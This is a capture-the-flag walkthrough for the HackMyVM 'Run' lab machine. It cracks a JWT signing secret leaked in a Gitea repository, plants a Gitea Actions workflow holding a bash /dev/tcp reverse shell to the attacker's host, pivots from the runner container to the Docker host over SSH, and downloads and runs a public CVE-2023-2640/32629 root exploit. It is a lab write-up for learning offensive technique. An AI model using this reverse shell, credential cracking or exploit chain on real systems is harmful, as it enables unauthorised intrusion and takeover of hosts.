Run - avijneyam

00. Metainfo

Title: Run
Author: avijneyam
Release date: 2024-03-05
Download from: HackMyVM
Level: Medium
System: Linux
You’ll learn: cracking a leaked JWT signing secret, abusing Gitea Actions for code execution, pivoting from a Docker container to its host, and running a public CVE exploit for local privilege escalation

01. Netdiscover

# ARP sweep of the lab /24 to locate the target. The vendor string
# "PCS Systemtechnik GmbH" is the VirtualBox NIC (nmap later confirms it).
netdiscover -r 172.16.1.0 -P
# 172.16.1.124    08:00:27:5a:e2:0d      1      60  PCS Systemtechnik GmbH

# Keep the target address in the environment so later commands can use "$IP".
IP=172.16.1.124
export IP

02. Nmap

# Default scan: only nmap's top 1000 TCP ports, no version detection.
# Only 3000/tcp answers (labelled "ppp" by port number; it is actually Gitea).
# NOTE(review): before assuming this is the sole exposed service, confirm
# with a full-range service scan, e.g. `nmap -p- -sV "$IP"`.
nmap "$IP"
# Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 18:33 CET
# Nmap scan report for run.lan (172.16.1.124)
# Host is up (0.0013s latency).
# Not shown: 999 closed tcp ports (reset)
# PORT     STATE SERVICE
# 3000/tcp open  ppp
# MAC Address: 08:00:27:5A:E2:0D (Oracle VirtualBox virtual NIC)

# Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

03. Git

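# Gitea on 3000/tcp lets anyone clone dev's repository without logging in.
git clone "http://${IP}:3000/dev/flask-jwt-auth.git"
# Cloning into 'flask-jwt-auth'...
# remote: Enumerating objects: 8, done.
# remote: Counting objects: 100% (8/8), done.
# remote: Compressing objects: 100% (8/8), done.
# remote: Total 8 (delta 1), reused 0 (delta 0), pack-reused 0
# Receiving objects: 100% (8/8), done.
# Resolving deltas: 100% (1/1), done.

# Stop if the clone did not produce the directory; otherwise `git show`
# would quietly run against whatever repository the current directory is in.
cd flask-jwt-auth || exit 1

# Show the HEAD commit. NOTE: `git show` only covers HEAD; to sweep the whole
# history for secrets use `git log -p --all` (or a dedicated secret scanner).
git show
# commit 82a427e2170354c619fb6e47345b684e39c4627c (HEAD -> main, origin/main, origin/HEAD)
# Author: dev <dev@run.hmv>
# Date:   Mon Feb 5 16:02:46 2024 +0000

#     initial commit

# diff --git a/app.py b/app.py
# index 127edca..36f1d68 100644
# --- a/app.py
# +++ b/app.py
# @@ -7,14 +7,14 @@ from flask_jwt_extended import create_access_token, JWTManager, get_jwt_identity

#  app = Flask(__name__)
#  app.config['SECRET_KEY'] = "super_secret_key"
# -app.config['DEV_INSTANCE'] = True
# +app.config['DEV_INSTANCE'] = False
#  app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///database.db"

#  db = SQLAlchemy(app)
#  api = Api(app)
#  jwt = JWTManager(app)

# -jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"
# +jwt_token = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"

#  class User(db.Model):
#      id = db.Column(db.Integer, primary_key=True)

# Reviewer note: the commit overwrites the token with "xxx…", but the real
# value survives in the removed line and therefore in every clone. Redacting
# a secret in a follow-up commit is not rotation: the signed JWT, whatever
# secret signed it, and the hard-coded Flask SECRET_KEY ("super_secret_key")
# all have to be treated as compromised.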

04. Hashcat

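#######################################
# Print every double-quoted JWT found on stdin, one per line, quotes stripped.
# "eyJ" is the base64url prefix of '{"', i.e. the start of a JWT header.
# Anchoring on the closing quote avoids swallowing trailing text on the line,
# which the earlier `\"eyJ.*` pattern would have included.
# Outputs: tokens on stdout; nothing when no token is present
#######################################
extract_jwts() {
  grep -o '"eyJ[^"]*"' | tr -d '"'
}

# NOTE: `git show` covers HEAD only; `git log -p --all` sweeps the history.
git show | extract_jwts > jwt.hash

# -m 16500 = JWT; the header decodes to alg HS256, so the "password" being
# guessed is the HMAC signing secret. -O enables optimized kernels (candidate
# length capped at 256, see the kernel banner below -- fine for rockyou).
hashcat -O -a 0 -m 16500 jwt.hash /usr/share/wordlists/rockyou.txt 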
# hashcat (v6.2.6) starting

# OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
# ==================================================================================================================================================
# * Device #1: cpu-penryn-QEMU Virtual CPU version 2.5+, 6944/13953 MB (2048 MB allocatable), 8MCU

# Minimum password length supported by kernel: 0
# Maximum password length supported by kernel: 256

# Hashes: 1 digests; 1 unique digests, 1 unique salts
# Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
# Rules: 1

# Optimizers applied:
# * Zero-Byte
# * Not-Iterated
# * Single-Hash
# * Single-Salt

# Watchdog: Hardware monitoring interface not found on your system.
# Watchdog: Temperature abort trigger disabled.

# Host memory required for this attack: 2 MB

# Dictionary cache hit:
# * Filename..: /usr/share/wordlists/rockyou.txt
# * Passwords.: 14344385
# * Bytes.....: 139921507
# * Keyspace..: 14344385

# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o:******
                                                          
# Session..........: hashcat
# Status...........: Cracked
# Hash.Mode........: 16500 (JWT (JSON Web Token))
# Hash.Target......: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6Zm...SMwU_o
# Time.Started.....: Wed Mar  6 18:42:48 2024 (10 secs)
# Time.Estimated...: Wed Mar  6 18:42:58 2024 (0 secs)
# Kernel.Feature...: Pure Kernel
# Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
# Guess.Queue......: 1/1 (100.00%)
# Speed.#1.........:   873.1 kH/s (7.72ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
# Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
# Progress.........: 8667136/14344385 (60.42%)
# Rejected.........: 0/8667136 (0.00%)
# Restore.Point....: 8658944/14344385 (60.36%)
# Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
# Candidate.Engine.: Device Generator
# Candidates.#1....: devilchild160 -> desiree007

# Started: Wed Mar  6 18:42:47 2024
# Stopped: Wed Mar  6 18:42:59 2024

The cracked signing secret (masked above as ******) doubles as dev's password, so you now have a login for the Gitea site: dev / <cracked secret>.

05. Gitea

01. Listener (on the attacker box, 172.16.1.89)

# Listener for the shell the workflow will send back; the port must match
# the one in shell.yaml. Leave it running while you push.
nc -l -v -p 12345

02. Gitea

1. Log in to Gitea as dev and create a new repository.
2. In the repository go to Settings -> Actions and tick "Enable Repository Actions".
3. Code -> New file, named `.gitea/workflows/shell.yaml`, with the workflow below. Committing it fires the `push` event and the job runs on the box's self-hosted runner.
# Gitea Actions workflow: every push runs this job on the self-hosted runner,
# which hands the attacker a shell as the runner's user (see section 06).
name: Reverse Shell
on:
  - push
jobs:
  Run-Command:
    # Must match a label of a registered runner; the box's runner answers to "run".
    runs-on: run
    steps:
      - name: Execute Command
        # Plain bash /dev/tcp reverse shell; 172.16.1.89:12345 is the listener
        # from step 01 -- change it to your own address/port.
        run: |
          /bin/bash -i &> /dev/tcp/172.16.1.89/12345 0>&1

06. Docker

# Listener output: the job ran and the runner container (hostname c1fcc2fa73ea)
# connected back.
connect to [172.16.1.89] from run.lan [172.16.1.124] 49048
# The runner's "act" user becomes root without any password prompt appearing
# below -- passwordless sudo inside the container. This is root in the
# container only, not on the host.
act@c1fcc2fa73ea:~/cache/actions/1ed8113a37c7a999/hostexecutor$ sudo su -
# sudo su -
# Upgrade to a PTY, background it (^Z), put the local terminal in raw mode and
# foreground again: the usual recipe for a fully interactive shell over nc.
script /dev/null -c bash
# Script started, output log file is '/dev/null'.
root@c1fcc2fa73ea:~# ^Z
[1]+  Zatrzymano              nc -lvp 12345
root@kali2023:~/hmv/run/flask-jwt-auth# stty raw -echo;fg
# nc -lvp 12345

# 172.18.0.0/16 is a Docker bridge; the gateway 172.18.0.1 turns out to be the
# Docker host itself (the ssh below lands on "run").
root@c1fcc2fa73ea:~# ip route show
# default via 172.18.0.1 dev eth0 
# 172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4 
# SSH from the container to the host as dev. The password is not echoed;
# presumably the same cracked secret that worked for Gitea (credential reuse).
root@c1fcc2fa73ea:~# ssh dev@172.18.0.1
# The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
# ED25519 key fingerprint is SHA256:IGhXsYmgq4sTpoMPHq+MgSiAiNHWOR4ZkocqlvZPGis.
# This key is not known by any other names.
# NOTE(review): accepting an unknown host key blindly is fine on a lab box;
# on a real engagement record the fingerprint for the report.
# Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
# Warning: Permanently added '172.18.0.1' (ED25519) to the list of known hosts.
# dev@172.18.0.1's password: 


# The programs included with the Ubuntu system are free software;
# the exact distribution terms for each program are described in the
# individual files in /usr/share/doc/*/copyright.

# Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
# applicable law.

# 172.18.0.4 is this container's own address (see `ip route` above): dev has
# been logging in from the runner container before, which is why the host
# trusts this path at all.
# Last login: Tue Feb  6 15:52:41 2024 from 172.18.0.4
dev@run:~$ 

07. Root

# Public exploit named after CVE-2023-2640 / CVE-2023-32629 (per the URL),
# used here as the final local privilege-escalation step.
# NOTE(review): do not run an unreviewed script from the internet blindly --
# it is only 558 bytes, so `cat exploit.sh` and read it first; and check the
# target's kernel/Ubuntu version against the advisory before expecting it to work.
dev@run:/tmp$ wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
# --2024-03-06 18:44:27--  https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
# Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
# Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 558 [text/plain]
# Saving to: ‘exploit.sh’

# exploit.sh                                     100%[=================================================================================================>]     558  --.-KB/s    in 0s

# 2024-03-06 18:44:27 (58.4 MB/s) - ‘exploit.sh’ saved [558/558]

dev@run:/tmp$ chmod +x exploit.sh 
dev@run:/tmp$ ./exploit.sh                                       
# The script only *claims* success; confirm with `id` (expect uid=0) before
# going after the root flag.
# [+] You should be root now
# [+] Type 'exit' to finish and leave the house cleaned
